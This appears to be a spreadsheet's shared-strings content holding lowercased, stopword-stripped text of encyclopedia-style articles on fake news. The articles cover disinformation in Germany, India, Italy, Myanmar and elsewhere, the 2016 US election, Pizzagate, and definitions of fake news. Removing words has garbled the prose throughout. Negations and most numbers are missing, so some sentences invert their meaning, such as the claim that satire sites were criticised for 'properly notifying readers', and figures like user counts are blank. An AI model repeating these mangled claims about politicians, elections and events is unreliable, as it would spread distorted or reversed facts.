media left right perspectives. germany german chancellor angela merkel lamented problem fraudulent news reports november 2016 speech, days announcing campaign fourth term leader country. speech german parliament, merkel critical fake sites, saying harmed political discussion. merkel called attention need government deal internet trolls, bots, fake news websites. warned fraudulent news websites force increasing power populist extremism. merkel called fraudulent news growing phenomenon might need regulated future. germany's foreign intelligence agency federal intelligence service chief, bruno kahl, warned potential cyberattacks russia 2017 german election. said cyberattacks would take form intentional spread disinformation. kahl said goal increase chaos political debates. germany's domestic intelligence agency federal office protection constitution chief, hans-georg maassen, said sabotage russian intelligence present threat german information security. india rasmus kleis nielsen, director reuters institute study journalism, thinks "the problems disinformation society like india might sophisticated challenging west". damage caused fake news social media increased growth internet penetration india, risen million internet users 2012 million 2019. india largest market whatsapp, million users, result main platforms fake news spread. main problems receivers believing anything sent social media lack awareness. various initiatives practices started adopted curb spread impact fake news. fake news also spread facebook, whatsapp twitter.according report guardian, indian media research agency stated cause spread fake news india "lacked media policy verification". additionally, enforcement officers arrested reporters journalists "creating fictitious articles", especially articles controversial.in india, fake news spread left right side political spectrum. study published theprint claimed twitter, least 17,000 accounts spreading fake news favour bjp, around accounts spreading fake news favour indian national congress. similarly, cell accused spreading fake news party's political opponents, religious minorities, campaigns party. cells bjp, congress political parties accused spreading fake news party's political opponents campaigns party. mouthpiece organizer congress mouthpiece national herald also accused misleading reports.prominent fake news-spreading websites online resources include opindia, logical indian postcard news. logical indian, initially started 2013 support current delhi indonesia philippines fraudulent news particularly problematic indonesia philippines, social media outsized political influence. according media analysts, developing countries access social media democracy felt fake news problem larger extent. developing countries, facebook gives away smartphone data free charge facebook media sources, time provide user internet access fact-checking websites. iran october 2020, bloomberg reported websites used iran spread misinformation seized united states government. italy between october november 2016, ahead italian constitutional referendum, five referendum-related stories social media participation hoaxes inaccurate. three stories social media attention, fake. prime minister italy matteo renzi u.s. president obama leaders europe meeting berlin, germany november 2016, spoke fake news problem. renzi hosted discussions facebook live effort rebut falsities online. influence became heavy senior adviser renzi began defamation complaint anonymous twitter user used screenname "beatrice maio".the five star movement (m5s), italian political party founded beppe grillo, managed fake news sites amplifying support russian news, propaganda, inflamed conspiracy theories. party's site tzetze million facebook fans shared fake news pieces supportive putin cited russia-owned sources including sputnik news. tzetze plagiarized russian sources, copied article titles content sputnik. tzetze, another site critical renzi called cosa, blog grillo—were managed company casaleggio associati started five star movement co-founder gianroberto casaleggio. casaleggio's davide casaleggio owns manages tzetze cosa, medical advice website fucina markets anti-vaccine conspiracy theories medical cure-all methods. grillo's blog, five star movement fake sites addresses, google analytics google adsense.cyberwarfare renzi increased, italian newspaper stampa brought attention false stories russia today wrongly asserted pro-renzi rally rome actually anti-renzi rally. october 2016, five star movement disseminated video kremlin-aligned russia today falsely reported displaying thousands individuals protesting december 2016 scheduled referendum italy—when fact video went million views showed supporters referendum. president italian chamber deputies, laura boldrini, stated: "fake news critical issue can’t ignore now." boldrini november 2016 vice president public policy europe facebook richard allan voice concerns fake news. said facebook needed admit media company. mexico elections mexico always rigged misinformation public. this true political party, whether democratic authoritarian. false information easily influences voters mexico, threaten state country actions taken misinformed citizens. mexico, fake exit polls moving within digital media outlets. what means citizens receiving real data happening elections. moldova amid 2018 local elections moldova doctored video mistranslated subtitles purported show pro-europe party candidate mayor chișinău (pop. 685,900), capital moldova proposed lease city chișinău years. video watched 300,000 times facebook almost 250,000 times russian social network site ok.ru, popular among moldova's russian-speaking population. myanmar 2015, fake stories using unrelated photographs fraudulent captions shared online support rohingya. fake news negatively affected individuals myanmar, leading rise violence muslims country. online participation surged percent percent myanmar's total populace 2014 2016. fake stories facebook reprinted paper periodicals called facebook internet. false reporting related practitioners islam country directly correlated increased attacks people religion myanmar. fake news fictitiously stated believers islam acted violence buddhist locations. buzzfeed news documented direct relationship fake news violence muslim people. noted countries relatively newer internet exposure vulnerable problems fake news fraud. pakistan khawaja muhammad asif, minister defence pakistan, threatened nuke israel twitter false story claiming avigdor lieberman, israeli ministry defense, said pakistan send ground troops syria pretext, destroy country nuclear attack." poland 2016 polish historian jerzy targalski noted fake news websites infiltrated poland anti-establishment right-wing focused sources copied content russia today. targalski observed existed specific fake news websites poland spread russian disinformation form fake news. example cited false claim ukraine claimed polish city przemyśl occupied poland. 2020 fake news websites related covid-19 pandemic identified officially labelled polish ministry health. sweden swedish security service issued report 2015 identifying propaganda russia infiltrating sweden objective amplify pro-russian propaganda inflame societal conflicts. swedish civil contingencies agency (msb), part ministry defence sweden, identified fake news reports targeting sweden 2016 originated russia. swedish civil contingencies agency official mikael tofvesson stated pattern emerged views critical sweden constantly repeated. identified russia today sputnik news significant fake news purveyors. result growth propaganda sweden, planned hire additional security officials fight back campaign fraudulent information. taiwan report december 2015 china post, fake video shared online showed people light show purportedly made shihmen reservoir. northern region water resources office confirmed light show reservoir event fabricated. fraud increase tourist visits actual attraction. ukraine deutsche welle interviewed founder stopfake.org 2014 website's efforts debunk fake news ukraine, including media portrayal ukrainian crisis. co-founder margot gontar began site march 2014, aided volunteers. 2014, deutsche welle awarded fact-checker website people's choice award russian ceremony bobs, recognizing excellence advocacy internet. gontar highlighted example debunked website, fictitious "doctor rozovskii" supposedly told guardian pro-ukraine individuals refused allow tend injured fighting russian supporters 2014. stopfake.org exposed event fabricated—there actually individual named "doctor rozovskii", found facebook photo distributed incident different individual russia separate identity. former ukraine president viktor yanukovych's ouster power created instability, 2015 organization security co-operation europe concluded russian disinformation campaigns used fake news disrupt relations europe ukraine. russian-financed news spread disinformation conflict ukraine motivated european union found european external action service specialist task force counter propaganda. united kingdom labour michael dugher assigned deputy leader labour party watson november 2016 investigate impact fake news spread social media. watson said would work twitter facebook root clear-cut circumstances "downright lies". watson wrote article independent suggested methods respond fake news, including internet-based societies fact-check manner modeled wikipedia. minister culture, matthew hancock, stated british government would investigate impact fake news pervasiveness social media websites. watson stated welcomed investigation fake news government. december 2016, chief secret intelligence service (mi6) alex younger delivered speech journalists headquarters called fake news propaganda damaging democracy. younger said mission combat propaganda fake news order deliver government strategic advantage information warfare arena, assist nations including european countries. called methods fake news propaganda online "fundamental threat sovereignty". younger said nations hold democratic values feel worry fake news. united states 2016 election cycle fraudulent stories 2016 u.s. presidential election popularized facebook included viral post pope francis endorsed donald trump, another actor denzel washington "backs trump epic possible". donald trump's campaign surrogate eric trump, national security adviser michael flynn, then-campaign managers kellyanne conway corey lewandowski shared fake news stories campaign. misuse term after 2016 election, republican politicians conservative media began appropriate term using describe news hostile agenda, according york times, cited breitbart news, rush limbaugh supporters donald trump dismissing true mainstream news reports, news like "fake news". u.s. response russia syria russian state-operated newswire novosti, known sputnik international, reported fake news fabricated statements white house press secretary josh earnest. novosti falsely reported december 2016 earnest stated sanctions russia table related syria. novosti falsely quoted earnest saying: "there number things considered, including financial sanctions united states administer coordination allies. would definitely rule out." however, word "sanctions" never used press secretary. russia discussed eight instances press conference, never sanctions. press conference focused solely russian raids syria towards rebels fighting president syria bashar al-assad aleppo. legislative executive responses members u.s. senate intelligence committee traveled ukraine poland march 2016 heard russian operations influence internal ukrainian matters. senator angus king recalled informed russia "planting fake news stories" elections. november 2016 seven members senate intelligence committee asked president obama publicize information russia's role spreading disinformation u.s. election. november 2016, legislators approved measure within national defense authorization finance u.s. state department foreign propaganda. initiative developed bipartisan bill, countering foreign propaganda disinformation act, written u.s. senators republican portman democrat chris murphy. republican u.s. senators stated planned hold hearings investigate russian influence 2016 u.s. elections. went preference incoming republican president-elect donald trump, downplayed potential russian meddling election. senate armed services committee chairman john mccain, senate intelligence committee chairman richard burr, u.s. senate foreign relations committee chairman corker, senator lindsey graham planned investigations 115th u.s. congress session.u.s. president barack obama commented fake news online speech election 2016, saying social media spread lies created "dust cloud nonsense". obama commented problem election: can't discriminate serious arguments propaganda, problems." december 2016, president obama ordered u.s. intelligence community conduct complete review russian propaganda operation. year-end press conference december 2016, president obama criticized hyper-partisan atmosphere enabling proliferation fake news. conspiracy theories 2016 pizzeria attack november 2016, fake news sites internet forums falsely implicated restaurant comet ping pong democratic party figures part fictitious child trafficking ring, dubbed "pizzagate". rumor widely debunked sources metropolitan police department district columbia, fact-checking website snopes.com, york times, news. restaurant's owners harassed threatened, increased security. december 2016, individual salisbury, north carolina, walked restaurant "self-investigate" conspiracy theory. brought semi-automatic rifle, fired shots arrested; injured. suspect told police planned "self-investigate" conspiracy theory, charged assault dangerous weapon, carrying pistol without license, unlawful discharge firearm, carrying rifle shotgun outside home business. after incident, future national security advisor michael flynn michael flynn criticized many reporters spreading rumors. days shooting, trump fired michael flynn transition team connection flynn's twitter posting fake news. days attack, hillary clinton spoke dangers fake news tribute speech retiring senator harry reid u.s. capitol, called problem epidemic. 2018 midterm elections track junk news shared facebook 2018 midterm elections, junk news aggregator archived 2021-01-27 wayback machine launched computational propaganda project oxford internet institute, university oxford. this aggregator public platform, offering three interactive tools tracking near real-time public posts shared facebook junk news sources, showing content user engagement numbers posts received. response fact-checking websites journalists fact-checking websites factcheck.org, politifact.com snopes.com authored guides respond fraudulent news. factcheck.org advised readers check source, author, date, headline publications. they recommended colleagues snopes.com, washington post fact checker, politifact.com. factcheck.org admonished consumers wary confirmation bias. politifact.com used "fake news" readers could view stories politifact debunked. snopes.com warned readers social media used harmful tool fraudsters. washington post's "the fact checker" manager glenn kessler wrote fact-checking sites increased visitors 2016 election cycle. unique visitors fact checker increased five-fold 2012 election. will moy, director london-based fact-checker full fact, said debunkin</t>
  </si>
  <si>
    <t>Fake news websites in the United States</t>
  </si>
  <si>
    <t>false news websites united states target american audiences using disinformation create inflame controversial topics 2016 election. most fake news websites target readers impersonating pretending real news organizations, lead legitimate news organizations spreading message. most notable media many websites made completely false claims political candidates hillary clinton donald trump, part larger campaign gain viewers revenue spread disinformation. additionally, satire websites received criticism properly notifying readers publishing false satirical content, since many readers duped seemingly legitimate articles. definition fake news websites deliberately publish hoaxes, propaganda, disinformation drive traffic inflamed social media. these sites distinguished news satire fake news articles usually fabricated deliberately mislead readers, either profit ambiguous reasons, disinformation campaigns. many sites originate promoted russia, north macedonia, romania, united states. many sites directly targeted united states u.s. high-value consumer extraordinary claims likely believed political crisis.the york times noted december 2016 article fake news previously maintained presence internet within tabloid journalism years prior 2016 u.s. election. however, prior election hillary clinton donald trump, fake news impacted election process high degree. subsequent election, issue fake news turned political weapon supporters clinton trump; back-and-forth complaints, definition fake news used argumentation became vaguer. methods fake news websites variety methods fool readers believing content, either attempting persuade readers legitimate distracting readers incredible news. clickbait fake news websites often article titles incredible, prompting user click read more. this method enticing readers view content website often leads exaggerated even fake titles. when linked sites, usually social media, extraordinary story title played large part tricking users cannot tell article real not. this became especially relevant 2016 election. additionally, out-of-context manipulated images cause readers incorrectly assume article's legitimacy, often inflammatory image choice.facebook's vice president news feed says social media giant defines clickbait headlines withhold significant amounts information mislead user". because difficult determine content exactly fake news, website uses data calculate likelihood headline clickbait. impersonation another method gaining readers impersonating legitimate news organization. this come forms, either copying popular news organization's website formatting pretending lesser known publication completely copying existing website name authors. exact copies trick viewers believing website official organization bloomberg.ma cnn-trending.com.abcnews.com.co fake news website "crudely" spoofed legitimate journalistic organization news, reality completely unrelated. site published fake stories, usually realistic clickbait headline, albeit story-details containing enough flaws "discerning reader would likely notice" false.the denver guardian blog site registered 2016 claimed legitimate newspaper denver, single fabricated story went viral. typosquatting typosquatting, form cybersquatting, based internet users mistyping name popular site. typosquatter monitor many clicks "typo" domain name receives information sell advertising sites receive high volume "accidental" traffic. many popular fake news websites like abcnews.com.co attempted impersonate legitimate u.s. news publication, relying readers actually checking address typed clicked they exploited common misspellings, slight misphrasings abuse top-level domains .com.co opposed .com. many social media users duped, believing going actual news publication's website. obscurity since authors websites actual reporters, many fake news sites either pretend identity reporter simply include 'about page. these websites almost never publications reference information tertiary sources like wikipedia. when sites publicized actual organizations, receive legitimacy along viewers. fake news campaigns election cycle office president become focal point around many campaigns fake news organized. 2020 election cycle november 2019 editorial diego union-tribune suggested facebook google broadcast cable networks done decades: politically neutral fact-checkers every single political this approach prevented past campaigns running powerful, hard-hitting ads. what prevent, least limit, rapid spread disinformation."according will robinson, democratic consultant founding partner media firm, "this first post-mass media election which, first time u.s. history, significant amounts money spent social media digital broadcast." glen bolger, partner public opinion strategies, leading republican polling firm, predicted like clean, positive, issue-oriented campaigns, going disappointed. it's going rough tumble."in december facebook twitter disabled global network pages, groups accounts sending pro-trump messages. fake news accounts managed avoid detection inauthentic, used photos generated artificial intelligence. campaign based u.s. vietnam. "there's question social media really changed talk politics," said deen freelon, media professor university north carolina chapel hill. "the example president who, whether like not, uses social media ways unprecedented president would politician."a 2019 article today stated "[in 2020 election,] many people running president many actors trying spread disinformation them, difficult determine 'fake news' created question disinformation campaigns, already started." 2016 election cycle fake news websites played large part online news community election, reinforced extreme exposure facebook google. approximately pro-trump fake stories shared facebook total million times, pro-clinton fake stories shared total million times. there main reasons creating fake news, economical ideological. teenagers veles, example, produced stories favoring trump clinton earned tens thousands dollars. some fake news providers seek advance candidates favor. romanian endingthefed.com, example, claims started site mainly help donald trump's campaign. major sites involved abcnews.com.co pro-right conservative daily post anti-left anti-right denver guardian known anti-hillary clinton articles disinfomedia anti-right articles aimed trick alt-rights news examiner anti-left articles subjectpolitics.com known anti-hillary clinton articles yournewswire.com inflammatory sides well conspiratorial social media professor philip howard university oxford found half news twitter directed michigan prior election junk fake. half came real news sources. criticized failing stop fake news spreading platform 2016 election, facebook thought problem could solved engineering, 2017 announced plans hire 3,000 content reviewers. fraudulent stories 2016 u.s. presidential election popularized facebook included viral post pope francis actor denzel washington endorsed donald trump.buzzfeed news found facebook last three months election, fake news stories received attention real news stories. discovered twenty fake news stories 8,711,000 shares, reactions, comments, twenty real news stories shared, commented reacted 7,367,000 times. prominent fraudulent news story released election—that protesters anti-trump rallies austin, texas, "bused in"—started tweet individual twitter followers. over next three days, tweet shared least 16,000 times twitter 350,000 times facebook, promoted conservative blogosphere, individual stated fabricated assertions.president barack obama commented significant problem fraudulent information social networks impacting elections speech election 2016, saying lies repeated social media created "dust cloud nonsense". shortly election, obama commented problem, saying appearance german chancellor angela merkel: can't discriminate serious arguments propaganda, problems". president trump also commented significantly fake news, creating fake news awards highlight real news outlets publicly "misrepresented" him. "pizzagate" early november 2016, fake news sites internet forums falsely implicated restaurant comet ping pong democratic party figures part fictitious child trafficking ring, dubbed "pizzagate". conspiracy theory debunked fact-checking website snopes.com, york times, news. restaurant's owners staff harassed threatened social media. after threats, comet ping pong increased security concerts held inside premises.days attack, hillary clinton spoke dangers fake news tribute speech retiring senator harry reid u.s. capitol. clinton called spread fraudulent news fabricated propaganda epidemic flowed social media. said posed danger citizens u.s. country's political process. clinton said speech supported bills u.s. congress deal fake news. notable examples fake news websites many websites categorized fake news satirical take news, ultimately fail convince readers content actually fake. realtruenews marco chacon created fake news site realtruenews show alt-right friends alleged gullibility. chacon wrote fake transcript clinton's leaked speeches clinton explains bronies goldman sachs bankers. chacon shocked fiction reported factual news heard writings megyn kelly's kelly file. trace gallagher repeated chacon's fiction falsely reported clinton called bernie sanders supporters "bucket losers"—a phrase made chacon. after denials clinton staff, megyn kelly apologized public retraction.chacon later told brent bambury radio program shocked readers' ignorance felt like episode twilight zone. interview news, chacon defended site, saying over-the-top parody fake sites teach friends ridiculous were. daily beast reported popularity chacon's fictions reported factual noted pro-trump message boards youtube videos routinely believed them. follow-up piece chacon wrote contributor daily beast 2016 u.s. election, concluded susceptible fake news consumers limited partisan media outlets. global associated news (mediafetcher.com) mediafetcher.com fake news website generator. various templates creating false articles celebrities user's choice. often users miss disclaimer bottom page, re-sharing. website prompted many readers speculate deaths various celebrities. huzlers similar global associated news, many readers tricked believing satire website huzlers. snopes separate fact checks articles, correcting fake news huzlers. according owner pablo reyes website "try trick people intentionally". 70news 70news wordpress-based blog site, produced fake news 2016; particular, story falsely stated donald trump popular vote 2016 election, fooled search engine algorithms ranked highly results election.when googling "final election vote count", website 70news come truthfully stated trump electoral college falsely stated trump ahead hillary clinton popular vote. next day, story dropped spot number search list. google commented software algorithms hundreds factors determine ranking. disinfomedia addition disconnected sites inadequate budget, sites many connections behind them: jestin coler angeles founded disinfomedia, company owns many fake news sites. gave interviews pseudonym, allen montgomery. with help tech-company engineer john jansen, journalists found coler's identity. coler explained intent project backfired; wanted expose alt-right echo chambers, point gullibility. stated company wrote fake articles left wing shared much right-wing point view. national report news examiner both fake news websites heavily profited clickbait headlines, usually false. paul horner, lead writer websites, focused significantly election, since drew strong revenue. told washington post made $10,000 month linked fake news. after election, horner said felt efforts helped trump. follow-up interview rolling stone, horner revealed washington post profile piece spurred increased interest interview requests media including news, news, cbs's inside edition. horner explained writing style: articles appeared legitimate became increasingly absurd reader progressed. these websites often referenced other. christian times newspaper interview york times, cameron harris annapolis, maryland, explains profited creating fake news website, christiantimesnewspaper.com, included false story claiming premarked ballots mrs. clinton held boxes warehouse ohio. within days, story earned around $5,000. news during summer 2016, news published series fake news stories regarding celebrity appearances filming locations random local towns. these towns included brentwood, tennessee, chandler, arizona, atlantic city, jersey. spread identification fake news percent adults news facebook. investigations conducted 2017 showed nearly percent content far-right facebook pages percent far-left pages false misleading. months leading 2016 presidential election, fake news articles shared facebook dramatically increased million shares, reactions, comments nearly million. mainstream media articles, hand, declined million shares, reactions, comments february million election day.a study conducted stanford graduate school education january 2015 revealed difficulties middle, high school, college students experienced differentiating advertisements news articles, identifying information originated. concern noted researchers study democracy risk devolving ways falsehoods civic issues quickly spread growing ease access. assessment, high school students asked evaluate facebook posts mentioning donald trump's candidacy president; actual news account fake account. over percent students stated fake account reliable graphic elements quarter recognized significance blue checkmark twitter facebook, indicates account marked legitimate. u.s. response educational elementary school teachers decided challenge results stanford study showing children importance deceived fake. fifth grade teacher scott bedley california created version "simon says", students given three minutes read article decide whether news story true false. bedley worked another teacher kansas, todd flory, devise "fake news challenge" skype whereby flory's class picked real articles wrote fake one, presented bedley's class california. teachers promoting learning techniques hope strategies skills stay students' rest adolescent adult lives.andreas schleicher, lead organization economic co-operation development (oecd), announced 2017 organization initiating "global competencies" tests taken 15-year-olds around world alongside oecd's current reading, maths science assessments, conducted every three years. this test well students discern fake news outside sociopolitical bubble.jennifer coogan, editor chief education startup newsela, partnered american press institute help combat fake news consumption addition regular literacy classes. believes teacher's responsibility help teach students media believe since near impossible parent monitor every source child read. commercial facebook after receiving heavy criticism stopping extreme number fake news articles platform, facebook announced december 2016 would begin flag fake news. enough users flagged story, story would sent third-party organization check veracity. failed, would lose news feed priority well "disputed party fact-checkers" caption. facebook also attempting reduce financial incentives attempt decrease amount fake news. fact checking organizations involved news, associated press, factcheck.org, politifact snopes.in 2018, facebook admitted "fell short" stopping outside meddling u.s. presidential election. this admission comes increased scrutiny lawmakers broader backlash silicon valley well senate hearing social media company executives.in today's world young people rely heavily social media access information broadcast news. many teens described traditional news "boring" "the same", implying predictable devoid questioning power. contrast, felt facebook postings, youtube videos, blogs, opinionated talk shows fake news provided background information perspectives enabled understand larger meanings political events develop opinions. them, truthful authentic rendition news. fact-checking organizations aftermath election, many fact-checking websites teamed facebook order check veracity linked articles. many organizations also posted lists fake news websites guides identify them. governmental legislative members u.s. senate intelligence committee traveled ukraine poland march 2016 heard officials countries russian operations influence affairs. u.s. senator angus king told portland press herald tactics used russia 2016 u.s. election analogous used countries. king recalled legislators informed officials ukraine poland russian tactics "planting fake news stories" elections. november 2016, king joined letter seven members u.s. senate intelligence committee asked president obama publicize information intelligence community russia's role u.s. election. interview cnn, senator king warned ignoring problem, saying bipartisan issue.amid worries fake news disinformation spread russia, representatives u.s. congress called action track counter alleged propaganda emanating overseas. november 2016, legislators approved measure within national defense authorization u.s. state department propaganda inter-agency panel. legislation authorized funding $160 million two-year-period. initiative developed bipartisan bill, countering foreign propaganda disinformation act, written u.s. senators republican portman democrat chris murphy. portman urged u.s. government action counter propaganda. murphy said election apparent u.s. needed additional tactics fight russian propaganda. u.s. senate intelligence committee member wyden said frustration covert russian propaganda bipartisan.republican u.s. senators stated planned hold hearings investigate russian influence 2016 u.s. elections. went preference incoming republican president-elect donald trump, downplayed potential russian meddling election. u.s. senate armed services committee chairman john mccain u.s. senate intelligence committee chairman richard burr discussed plans collaboration investigations russian cyberwarfare election. u.s. senate foreign relations committee chairman corker planned 2017 investigation. senator lindsey graham indicated would conduct sweeping investigation 115th u.s. congress session. 2013, federal trade commission, part campaign crack bogus health claims, charged $1.6 million beony international, owner mario milanovic, beony international employee cody adams. they conspired promote weight loss products fake news websites. these websites pretended legitimate news organizations heavily promoted acai berry weight-loss products. counter-disinformation team united states department state planned unit called counter-disinformation team, formed intention combating disinformation russian government; disbanded september 2015 department heads missed scope propaganda 2016 u.s. election. u.s. state department eight months developing unit scrapping would reboot active measures working group president reagan. counter-disinformation team bureau international information programs. work began 2014, intention combat propaganda russian sources russia today. u.s. intelligence officials explained former national security agency analyst counterintelligence officer john schindler obama administration decided cancel unit afraid antagonizing russia. u.s. undersecretary state public diplomacy richard stengel point person unit canceled. stengel previously wrote disinformation russia today. also confirmation bias fake news filter bubble list conspiracy theories list fake news websites list satirical news websites selective exposure theory spiral silence references further reading chris hedges (december 2016). "'fake news': homegrown, from new". truthdig. jamie condliffe (november 2016). "facebook's fake-news enough". technology review. cassandra jaramillo (november 2016). "how break friends family they're sharing fake news". dallas morning news. craig silverman; lawrence alexander (november 2016). "how teens balkans duping trump supporters with fake news". buzzfeed. ishmael daro; craig silverman (november 2016). "fake news sites terribly worried about google kicking them adsense". buzzfeed. craig silverman (november 2016). "viral fake election news outperformed real news facebook final months election". buzzfeed. taylor, adam (november 2016). "before 'fake news,' soviet 'disinformation'". washington post. andrew weisburd; clint watts; berger (november 2016). "trolling trump: russia trying destroy democracy". rocks. elizabeth schumacher (january 2018). "fake news 'casts wide little effect'". deutsche welle. dominick sokotoff; katherina sourine (november 2019). "pseudo local news sites reveal nationally expanding network". michigan daily. lazer, david baum, matthew benkler, yochai; berinsky, adam greenhill, kelly menczer, filippo; metzger, miriam nyhan, brendan; pennycook, gordon; rothschild, david; schudson, michael; sloman, steven sunstein, cass thorson, emily watts, duncan zittrain, jonathan (march 2018). "the science fake news". science. (6380): 1094–1096. bibcode:2018sci...359.1094l. doi:10.1126/science.aao2998. pmid 29590025. s2cid 4410672. shu, kai; sliva, amy; wang, suhang; tang, jiliang; liu, huan (september 2017). "fake news detection social media". sigkdd explorations newsletter. (1): 22–36. doi:10.1145/3137597.3137600. s2cid 207718082. tandoc, edson lim, zheng wei; ling, richard (august 2017). "defining 'fake news'". digital journalism. (2): 137–153. doi:10.1080/21670811.2017.1360143. s2cid 158143268. guess, andrew; nyhan, brenden; reifler, jason (2018). selective exposure misinformation: evidence consumption fake news 2016 u.s. presidential campaign (report). s2cid 158536258. pennycook, gordon; rand, david (july 2019). "lazy, biased: susceptibility partisan fake news better explained lack reasoning motivated reasoning". cognition. 188: 39–50. doi:10.1016/j.cognition.2018.06.011. pmid 29935897. s2cid 49418191. ssrn 3165567. paula span (september 2020), "getting wise fake news", york times, older adults particularly vulnerable misinformation social media external links lacapria (november 2016). "snopes' field guide fake news sites hoax purveyors". snopes.com.{{cite web}}: maint: url-status (link) rachel dicker (november 2016). "avoid these fake news sites costs". u.s. news world report. lori robertson; eugene kiely (november 2016). "how spot fake news". factcheck.org. annenberg public policy center. jared keller (november 2016). "this critique fake election news must-read democracy lovers". mother jones. lance ulanoff (november 2016). signs news sharing fake". mashable. laura hautala (november 2016). "how avoid getting conned fake news sites here's identify avoid sites want serve next outright falsehoods". cnet. sreenivasan, hari (november 2016). online hoaxes fake news played role election. newshour youtube.</t>
  </si>
  <si>
    <t>Fake news</t>
  </si>
  <si>
    <t>fake news false misleading information presented news. fake news often damaging reputation person entity, making money advertising revenue. although false news always spread throughout history, term "fake news" first used 1890s sensational reports newspapers common. nevertheless, term fixed definition applied broadly type false information. it's also used high-profile people apply news unfavourable them. further, disinformation involves spreading false information harmful intent sometimes generated propagated hostile foreign actors, particularly elections. definitions, fake news includes satirical articles misinterpreted genuine, articles employ sensationalist clickbait headlines supported text. because diversity types false news, researchers beginning favour information disorder neutral informative term. prevalence fake news increased recent rise social media, especially facebook news feed, misinformation gradually seeping mainstream media. several factors implicated spread fake news, political polarization, post-truth politics, motivated reasoning, confirmation bias, social media algorithms.fake news reduce impact real news competing example, buzzfeed analysis found fake news stories 2016 u.s. presidential election received engagement facebook stories major media outlets. also particularly potential undermine trust serious media coverage. term times used cast doubt upon credible news, former u.s. president donald trump credited popularizing term using describe negative press coverage himself. increasingly criticized, part trump's misuse, british government deciding avoid term, "poorly-defined" "conflates variety false information, genuine error foreign interference". multiple strategies fighting fake news currently actively researched, various types fake news. politicians certain autocratic democratic countries demanded effective self-regulation legally-enforced regulation varying forms, social media search engines. individual scale, ability actively confront false narratives, well taking care sharing information reduce prevalence falsified information, however, noted vulnerable effects confirmation bias, motivated reasoning cognitive biases seriously distort reasoning, particularly dysfunctional polarised societies. inoculation theory proposed method render individuals resistant undesirable narratives. defining fake news fake news false misleading information presented news. term neologism re-purposed expression entering language, driven culture technology changes). fake news, fake news websites, basis fact, presented factually accurate. fake news also called junk news, pseudo-news, alternative facts, false news, hoax news bullshit.national endowment democracy defined fake news "[m]isleading content found internet, especially social media [...] much content produced for-profit websites facebook pages gaming platform advertising revenue." distinguished disinformation: "[f]ake news meet definition disinformation propaganda. motives usually financial, political, usually tied larger agenda."media scholar nolan higdon defined fake news "false misleading content presented news communicated formats spanning spoken, written, printed, electronic, digital communication. higdon argued definition fake news applied narrowly select mediums political ideologies. fake news also refers stories fabricated obtain little verifiable facts. even broadly, people, notably former united states president donald trump, broadened meaning "fake news" include news negative personal beliefs actions.michael radutzky, producer minutes, said show considers fake news "stories probably false, enormous traction [popular appeal] culture, consumed millions people." these stories found politics, also areas like vaccination, stock values nutrition. include news "invoked politicians media stories like comments like" fake news. campanile, also minutes producer said, "what talking stories fabricated thin air. measures, deliberately, definition, that's lie."the intent purpose fake news important. cases, appears fake news news satire, uses exaggeration introduces non-factual elements intended amuse make point, rather deceive. propaganda also fake news. some researchers highlighted "fake news" distinguished falsity content, also "character [its] online circulation reception".in context united states america election processes 2010s, fake news generated considerable controversy argument, commentators defining concern moral panic mass hysteria others worried damage done public trust. particularly potential undermine trust serious media coverage generally. term also used cast doubt upon credible mainstream media.in january 2017, united kingdom house commons commenced parliamentary inquiry "growing phenomenon fake news".in 2016, politifact selected fake news year. there much united states election year, president donald trump, single stood out, generic term chosen. also 2016, oxford dictionaries selected post-truth word year defined state affairs "objective facts less influential shaping public opinion appeals emotion personal belief." fake news boldest sign post-truth society. when can't agree basic facts—or even things facts—how talk other? roots term "fake news" gained importance electoral context western europe north america. determined fraudulent content news format velocity. according bounegru, gray, venturini mauri, fake news deliberate picked dozens blogs, retransmitted hundreds websites, cross-posted thousands social media accounts read hundreds thousands" effectively becomes "fake news".the evolving nature online business models encourages production information "click-worthy" independent accuracy.the nature trust depends assumptions non-institutional forms communication freer power able report information mainstream media perceived unable unwilling reveal. declines confidence much traditional media expert knowledge created fertile grounds alternative, often obscure sources information appear authoritative credible. this ultimately leaves users confused basic facts. popularity viral spread fake news become popular various media outlets platforms. researchers research center discovered americans access news social media compared traditional newspaper magazines. with popularity social media, individuals easily access fake news similar content. study looks number fake news articles accessed viewers 2016 found individual exposed least fake news articles daily. result, fake news omnipresent among viewer population results ability spread across internet. fake news tendency become viral among public. with presence social media platforms like twitter, becomes easier false information diffuse quickly. research found false political information tends spread "three times" faster false news. twitter, false tweets much higher chance retweeted truthful tweets. more humans responsible disseminating false news information opposed bots click-farms. tendency humans spread false information human behavior; according research, humans attracted events information surprising new, and, result, causes high-arousal brain. besides, motivated reasoning found play role spread fake news. this ultimately leads humans retweet share false information, usually characterized clickbait eye-catching titles. this prevents people stopping verify information. result, massive online communities form around piece false news without prior fact checking verification veracity information. particular concern regarding viral spread fake news role super-spreaders. brian stelter, anchor reliable sources cnn, documented systematic long-term two-way feedback developed president donald trump news presenters. resultant conditioning outrage large audience government mainstream media, proved highly successful money-spinner network. damaging effects 2017, inventor world wide web, berners-lee claimed fake news three significant disturbing internet trends must first resolved, internet capable truly "serving humanity." disturbing trends berners-lee described threatening internet recent surge internet governments citizen-surveillance purposes, cyber-warfare purposes.author terry pratchett, previously journalist press officer, among first concerned spread fake news internet. 1995 interview bill gates, founder microsoft, said "let's call institute something-or-other decide promote spurious treatise saying jews entirely responsible second world war, holocaust happen, goes internet available terms piece historical research undergone peer review there's kind parity esteem information net. it's there: there's finding whether stuff bottom whether someone made up". gates optimistic disagreed, saying authorities would index check facts reputations much sophisticated print. pratchett accurately predicted internet would propagate legitimize fake news.when internet first became accessible public 1990s, main purpose seeking accessing information. fake news introduced internet, made difficult people find truthful information. impact fake news become worldwide phenomenon. fake news often spread fake news websites, which, order gain credibility, specialize creating attention-grabbing news, often impersonate well-known news sources. jestin coler, said "fun", indicated earned us$10,000 month advertising fake news websites. research shown fake news hurts social media online based outlets worse traditional print outlets. after survey conducted, found people less trust social media news stories opposed people mainstream media learning fake news. types fake news claire wardle first draft news, preliminary findings, identifies seven types fake news: satire parody ("no intention cause harm potential fool") false connection ("when headlines, visuals captions support content") misleading content ("misleading information frame issue individual") false context ("when genuine content shared false contextual information") impostor content ("when genuine sources impersonated" false, made-up sources) manipulated content ("when genuine information imagery manipulated deceive", "doctored" photo) fabricated content ("new content 100% false, designed deceive harm")scientific denialism another potential explanatory type fake news, defined producing false misleading facts unconsciously support strong pre-existing beliefs. criticism term 2017, wardle announced rejected phrase "fake news" "censors conversation", finding "woefully inadequate" describe issues. speaks "information disorder" "information pollution", distinguishes three overarching types information content problems: mis-information (misinformation): false information disseminated without harmful intent. dis-information (disinformation): false information created shared people harmful intent. mal-information 